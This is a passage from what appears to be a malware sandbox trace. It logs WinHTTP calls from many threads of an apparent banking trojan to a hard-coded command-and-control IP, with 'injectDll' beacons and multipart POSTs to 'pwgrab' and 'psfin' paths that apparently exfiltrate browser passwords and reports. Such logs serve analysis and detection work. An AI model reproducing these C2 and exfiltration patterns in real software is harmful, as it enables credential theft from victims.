Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xa10

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xd44

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11072810	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/psfin/Log/SendReport/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BB9DAA Content-Length: 131 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/psfin/Log/SendReport/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xd48

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11072810	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/psfin/Log/SendReport/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BB9DAA Content-Length: 129 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/psfin/Log/SendReport/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xd80

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xd88

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xd7c

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xdc0

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xd78

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xdb0

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11078520	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BBB3F8 Content-Length: 139 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xdb8

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11078535	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BBB407 Content-Length: 140 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xd98

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11078660	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BBB484 Content-Length: 134 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xd8c

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11078660	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BBB484 Content-Length: 141 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xdac

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11078691	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BBB4A3 Content-Length: 128 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xd94

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11078691	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BBB4A3 Content-Length: 130 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xd9c

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
System	Get Time	type = Ticks, time = 11078738	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=------Boundary01BBB4D2 Content-Length: 128 , url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0x8ec

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xbf0

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xbec

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xbe8

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xbdc

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xdf8

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xba0

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0xbac

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 95.213.191.109, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 95.213.191.109/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0x604

Category	Operation	Information	Count	Logfile
